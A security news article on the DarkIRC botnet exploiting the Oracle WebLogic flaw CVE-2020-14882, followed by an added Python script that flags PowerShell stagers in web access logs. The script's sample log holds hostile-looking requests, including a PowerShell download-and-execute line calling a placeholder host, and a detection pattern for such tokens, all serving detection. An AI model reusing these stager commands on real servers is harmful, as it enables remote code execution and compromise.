Juniper Threat Labs researchers observed that a botnet known as DarkIRC is actively targeting thousands of exposed Oracle WebLogic servers in attacks designed to exploit CVE-2020-14882, a remote code execution (RCE) vulnerability fixed by Oracle two months ago.
Last month, attackers also targeted Oracle WebLogic servers vulnerable to CVE-2020-14882 exploits to deploy Cobalt Strike beacons that allow for persistent remote access to compromised servers for harvesting information and deploying second stage malware payloads.
According to Shodan, 2,973 Oracle WebLogic servers exposed online are potentially vulnerable to remote attacks exploiting the above flaw. Most of these systems are in China (829), followed by the United States (526) and Iran (369).
This vulnerability, if successfully exploited, allows unauthenticated remote code execution. Using Shodan, researchers found almost 3,109 exposed Oracle WebLogic servers.
Oracle WebLogic Server is one of the most widely used application servers for building and deploying enterprise Java EE applications. According to cybersecurity researchers, the WebLogic Server flaw, tracked as CVE-2020-14882, carries a CVSS score of 9.8 out of 10.
Oracle, for its part, rated the attack as “low” in complexity, requiring no prerequisites and no user interaction. The flaw can easily be exploited by threat actors with network access over HTTP.
Juniper Threat Labs researchers observed at least five different variants of the malicious payload.
The most interesting is the DarkIRC malware “currently being sold on hack forums for $75.”
The threat actor selling the DarkIRC botnet on Hack Forums goes by the name Freak_OG and began advertising it in August 2020.
Juniper Threat Labs did not say that this threat actor is behind the ongoing DarkIRC attacks, even though the filename of one of the recently detected payloads is similar to a FUD (Fully Undetected) Crypter filename also advertised by Freak_OG earlier this month.
“We are not certain if the bot operator who attacked our honeypot is the same person who is advertising this malware in Hack Forums or one of his/her customers,” the report reads.
DarkIRC is delivered to unpatched servers through a PowerShell script executed via an HTTP GET request; the script drops a malicious binary that comes with both anti-analysis and anti-sandbox capabilities.
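The delivery described above leaves a trace that defenders can look for in web-server access logs: a GET request whose target carries a PowerShell command line. The following is an added example (not code from Juniper Threat Labs or from the article) that parses combined-format access-log lines and flags requests whose decoded URL contains PowerShell invocation tokens. The log lines, IP addresses, paths and query strings are constructed for this example, and the token list (`PS_TOKENS`) is a heuristic assumption rather than a published signature.

```python
"""Flag HTTP GET requests whose URL carries PowerShell invocation tokens.

Added example: parses Apache/NGINX combined-format access-log lines and
reports requests that look like a PowerShell stager being passed in the
request target, the delivery pattern described for the DarkIRC payload.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines; hosts, paths and payload strings are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Dec/2020:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Dec/2020:10:00:05 +0000] "GET /console/?cmd=powershell%20-nop%20-w%20hidden%20-enc%20QUJD HTTP/1.1" 302 0 "-" "curl/7.68.0"
198.51.100.9 - - [01/Dec/2020:10:00:06 +0000] "GET /console/?x=cmd.exe%20/c%20PoWeRsHeLl%20IEX(New-Object%20Net.WebClient).DownloadString('http://example.invalid/a.ps1') HTTP/1.1" 302 0 "-" "python-requests/2.25"
192.0.2.44 - - [01/Dec/2020:10:00:09 +0000] "POST /app/api/search?q=powershell+tutorial HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic tokens (an assumption for this example) that typically appear
# when a PowerShell command line is smuggled inside a request target.
PS_TOKENS = re.compile(
    r"powershell|pwsh|-enc(odedcommand)?\b|\bIEX\b|Invoke-Expression"
    r"|DownloadString|New-Object\s+Net\.WebClient",
    re.IGNORECASE,
)


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode twice so that double-percent-encoded payloads are also visible.
    rec["decoded"] = unquote(unquote(rec["target"]))
    return rec


def find_suspicious(log_text, methods=("GET",)):
    """Return one record per request (of the given methods) whose decoded
    target contains PowerShell invocation tokens."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] not in methods:
            continue
        tokens = sorted({t.group(0).lower() for t in PS_TOKENS.finditer(rec["decoded"])})
        if tokens:
            hits.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "status": rec["status"],
                "target": rec["decoded"],
                "tokens": tokens,
            })
    return hits


def sources_by_hits(hits):
    """Count flagged requests per source IP, a quick pivot for triage."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["tokens"])
    print(sources_by_hits(find_suspicious(SAMPLE_LOG)))
```

Restricting the scan to GET requests keeps the benign POST search query in the sample out of the results; widening `methods` to include POST makes it show up, which illustrates why these tokens are a triage heuristic to review rather than a verdict on their own. A 302 or 200 response to such a request is a reason to check the host for the dropped binary, not proof that it ran.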
DarkIRC comes with a multitude of capabilities including but not limited to keylogging, downloading files and executing commands on the infected server, credential stealing, spreading to other devices via MSSQL and RDP (brute force), SMB, or USB, as well as launching several versions of DDoS attacks.
Attackers can also use the bot as a Bitcoin clipper that replaces bitcoin wallet addresses copied to the clipboard with one controlled by its operators in real time.